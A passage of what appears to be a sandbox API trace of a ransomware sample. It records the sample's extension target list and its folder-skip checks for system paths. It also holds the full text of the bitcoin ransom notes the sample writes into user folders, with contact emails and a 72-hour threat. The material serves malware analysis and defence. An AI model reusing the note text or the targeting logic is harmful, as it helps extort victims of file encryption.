d.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".search-ms") returned 0x0
	[0198.806] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0
	[0198.806] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0198.807] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0198.807] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Searches" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches") returned="C:\\Users\\RDhJ0CNFevzX\\Searches"
	[0198.807] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*"
	[0198.807] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.807] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.807] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Searches\\HELP_DECRYPT_YOUR_FILES.TXT") returned 58
	[0198.808] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.812] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0198.812] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0198.816] CloseHandle (hObject=0x380) returned 1
	[0198.816] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.816] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.817] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0198.818] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0198.818] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.818] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0198.818] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0198.818] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0198.818] CloseHandle (hObject=0x380) returned 1
	[0198.819] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.819] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.819] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0198.819] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Searches\\HELP_DECRYPT_YOUR_FILES.HTML") returned 59
	[0198.819] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.820] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0198.820] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0198.822] CloseHandle (hObject=0x380) returned 1
	[0198.823] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.823] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.824] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0198.824] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.825] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.825] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0198.825] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.825] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0198.825] CloseHandle (hObject=0x380) returned 1
	[0198.825] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x90096b9f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0198.826] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*") returned 34
	[0198.826] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.826] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\rdhj0cnfevzx\\searches\\*.*") returned 0x22
	[0198.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.826] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="windows") returned 0x0
	[0198.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.827] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="boot") returned 0x0
	[0198.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.827] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="system volume information") returned 0x0
	[0198.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.827] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.827] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="temp") returned 0x0
	[0198.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.828] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="program files") returned 0x0
	[0198.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.828] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.828] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="appdata") returned 0x0
	[0198.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.829] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="application data") returned 0x0
	[0198.829] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.829] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="winnt") returned 0x0
	[0198.829] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.829] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="tmp") returned 0x0
	[0198.829] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.834] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="cache") returned 0x0
	[0198.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.835] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.835] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="webcache") returned 0x0
	[0198.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.835] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="inetcache") returned 0x0
	[0198.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.835] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="nvidia") returned 0x0
	[0198.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.836] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="packages") returned 0x0
	[0198.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.836] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="cookies") returned 0x0
	[0198.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.836] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="programdata") returned 0x0
	[0198.836] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0198.836] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0198.836] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x90096b9f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.837] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0198.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x437a1142, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1
	[0198.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90096b9f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90096b9f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90096b9f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0198.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90070dbf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90070dbf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90096b9f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0198.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1
	[0198.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0
	[0198.837] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0198.837] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0198.838] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1
	[0198.838] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1
	[0198.838] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1
	[0198.838] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0198.838] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0198.838] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="SendTo" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo") returned="C:\\Users\\RDhJ0CNFevzX\\SendTo"
	[0198.839] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\SendTo" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo") returned="C:\\Users\\RDhJ0CNFevzX\\SendTo"
	[0198.839] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo\\") returned="C:\\Users\\RDhJ0CNFevzX\\SendTo\\"
	[0198.839] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\SendTo\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo\\") returned="C:\\Users\\RDhJ0CNFevzX\\SendTo\\"
	[0198.839] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\SendTo\\*.*"
	[0198.839] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\sendto\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff
	[0198.839] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0198.839] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\SendTo" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo") returned="C:\\Users\\RDhJ0CNFevzX\\SendTo"
	[0198.840] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\SendTo\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\SendTo\\*.*"
	[0198.840] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.840] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.840] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\SendTo\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0198.840] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\sendto\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.866] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0198.866] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0198.869] CloseHandle (hObject=0x380) returned 1
